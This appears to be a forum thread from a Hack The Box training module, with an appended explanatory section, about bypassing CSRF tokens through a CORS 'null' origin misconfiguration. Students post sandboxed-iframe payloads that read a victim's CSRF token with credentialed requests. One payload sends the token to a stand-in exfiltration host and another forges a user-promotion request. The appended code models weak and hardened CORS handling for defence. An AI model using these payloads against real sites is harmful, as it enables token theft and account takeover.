ADVANCED XSS AND CSRF EXPLOITATION - Bypassing CSRF Tokens via CORS Misconfigurations

Hi

In the challenge for this section, whenever an Origin is set the server returns Access-Control-Allow-Origin: null, so I used iframes. However, the browser refuses to send the cookies because they are third-party.

Any help?

Hi, I have been using Burp Suite’s built-in web browser and have not had any problems. I got the flag. For the following section “Misc CSRF Exploitation” I recommend using Firefox to view the flag.

Which version? All “modern” browsers seem to take issue.

Burp Suite 2023.10.3.5. I am using an old Kali. What error do you get? If not, write privately.

Hi @Ezi0,

I ran this script in Burp Suite’s built-in web browser, but when I test it, I see that it does not run.
Can you give me a recommendation? Thank you.

```html
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>

Hello my friend

<iframe sandbox="allow-scripts allow-top-navigation allow-forms allow-same-origin" srcdoc="<script>
	// GET CSRF token (synchronous request, so the response is available as soon as send() returns)
	var xhr = new XMLHttpRequest();
	xhr.open('GET', 'https://vulnerablesite.htb:54844/profile.php', false);
	xhr.withCredentials = true;

	xhr.onload = () => {
		// parse the response
		var doc = new DOMParser().parseFromString(xhr.response, 'text/html');

		// exfiltrate only the interesting element
		var msg = encodeURIComponent(doc.getElementById('csrf').innerHTML);
		location = 'https://exfiltrate.htb:54844/log?data=' + btoa(msg);
	};

	xhr.send();
</script>"></iframe>
```

Hi @nn.long, I used the payload listed in the section “Bypassing CSRF Tokens via CORS Misconfigurations” and made only two modifications. Do you really need the xhr.onload? You also need to correctly identify the id that references the token and thus add the correct id in the “doc.getElementById(‘id_correct’)”

Hi @Ezi0,

I tried the fix and got the id as you recommended, but nothing happened; when I reload the page, I don’t see the promotion of the user.
My script is here.

```html
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>

Hello my friend

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
	// the inline document goes in the srcdoc attribute, not src (src expects a URL)
	// GET CSRF token (synchronous request, so responseText is populated after send())
	var xhr = new XMLHttpRequest();
	xhr.open('GET', 'https://vulnerablesite.htb:56437/profile.php', false);
	xhr.withCredentials = true;
	xhr.send();
	var doc = new DOMParser().parseFromString(xhr.responseText, 'text/html');
	var csrftoken = encodeURIComponent(doc.getElementById('csrf_token').value);

	// do CSRF
	var csrf_req = new XMLHttpRequest();
	var params = `promote=htb-stdnt&csrf_token=${csrftoken}`;
	csrf_req.open('POST', 'https://vulnerablesite.htb:56437/profile.php', false);
	csrf_req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	csrf_req.withCredentials = true;
	csrf_req.send(params);
</script>"></iframe>
```

Exact same problem here.
I saved the exploit on localhost and added a Burp match-and-replace rule for ‘Origin: null’ to ensure the header is changed, and even running the script from the console I see these errors:

Access to XMLHttpRequest at 'https://bypassing-csrftokens.htb/profile.php' from origin 'http://127.0.0.1' has been blocked by CORS policy: The 'Access-Control-Allow-Origin' header has a value 'null' that is not equal to the supplied origin.
(anónimo) @ VM39:4
Uncaught NetworkError: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'https://bypassing-csrftokens.htb/profile.php'.

And in Burp I see that the GET request is made, so is the browser in fact blocking it?
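The CORS behaviour this thread keeps running into, as an added example that is not part of the thread or of the HTB module: a small model of the server's CORS decision (the weak "answer every other origin with null" pattern next to an allowlisted version), the browser-side check that produces the console error quoted above, and a SameSite check for the session cookie. All function names, the allowlisted hostname and the cookie values are constructed for illustration; the "missing SameSite means Lax" rule is an assumption based on the Chromium default.

```javascript
// Added example (not from the thread or the HTB module). Function names and the
// allowlisted hostname are constructed for illustration.

const ALLOWED_ORIGINS = new Set(['https://app.vulnerablesite.htb']); // constructed allowlist

// Weak server: echoes an allowlisted origin, but answers every other Origin with
// the literal string "null" while still allowing credentials. Sandboxed iframes,
// data: URLs and file:// pages serialize their origin as "null", so this value
// matches them exactly and the browser lets such a page read the response.
function weakCorsHeaders(originHeader) {
  if (ALLOWED_ORIGINS.has(originHeader)) {
    return { 'Access-Control-Allow-Origin': originHeader,
             'Access-Control-Allow-Credentials': 'true' };
  }
  return { 'Access-Control-Allow-Origin': 'null',
           'Access-Control-Allow-Credentials': 'true' };
}

// Hardened server: exact allowlist match only, never "null", credentials only
// together with a concrete origin, and Vary: Origin so a shared cache cannot
// replay one origin's answer to another. Unknown origins get no CORS headers.
function hardenedCorsHeaders(originHeader) {
  if (typeof originHeader === 'string' && originHeader !== 'null' &&
      ALLOWED_ORIGINS.has(originHeader)) {
    return { 'Access-Control-Allow-Origin': originHeader,
             'Access-Control-Allow-Credentials': 'true',
             'Vary': 'Origin' };
  }
  return {};
}

// Model of the browser-side check behind the console error quoted in the thread:
// a credentialed cross-origin response is readable only when ACAO equals the
// requesting document's origin serialization exactly; "*" or a missing header fails.
function browserAllowsCredentialedRead(pageOrigin, responseHeaders) {
  const acao = responseHeaders['Access-Control-Allow-Origin'];
  const acac = responseHeaders['Access-Control-Allow-Credentials'];
  if (acao === undefined || acao === '*') return false;
  if (acac !== 'true') return false;
  return acao === pageOrigin;
}

// Run one configuration end to end: the page at pageOrigin sends its Origin,
// the server answers, the browser decides whether the script may read the body.
function crossOriginReadAllowed(serverHandler, pageOrigin) {
  return browserAllowsCredentialedRead(pageOrigin, serverHandler(pageOrigin));
}

// Second layer of defence: would this session cookie even be attached to a
// cross-site XMLHttpRequest? Parses the SameSite attribute of a Set-Cookie value.
// Assumption: a missing SameSite attribute is treated as Lax (the Chromium default).
function cookieSentCrossSite(setCookieValue) {
  const attrs = setCookieValue.split(';').slice(1).map(a => a.trim().toLowerCase());
  const sameSite = attrs.find(a => a.startsWith('samesite='));
  const secure = attrs.includes('secure');
  const mode = sameSite ? sameSite.split('=')[1] : 'lax';
  // Only SameSite=None cookies travel on cross-site subresource requests,
  // and browsers require Secure for those.
  return mode === 'none' && secure;
}

// Stand-alone demonstration with constructed origins, including the two that
// appear in the thread ("null" from a sandboxed iframe, 127.0.0.1 from the console).
for (const origin of ['null', 'http://127.0.0.1', 'https://app.vulnerablesite.htb']) {
  console.log(origin,
    'weak:', crossOriginReadAllowed(weakCorsHeaders, origin),
    'hardened:', crossOriginReadAllowed(hardenedCorsHeaders, origin));
}
```

The weak handler reproduces both observations from the thread: a page running from `http://127.0.0.1` is blocked because `null` does not equal its origin, while a sandboxed srcdoc iframe (origin `null`) is not. The hardened handler returns no CORS headers at all for anything outside the allowlist, and a session cookie set with `SameSite=Lax` or `Strict` is not attached to the cross-site request in the first place.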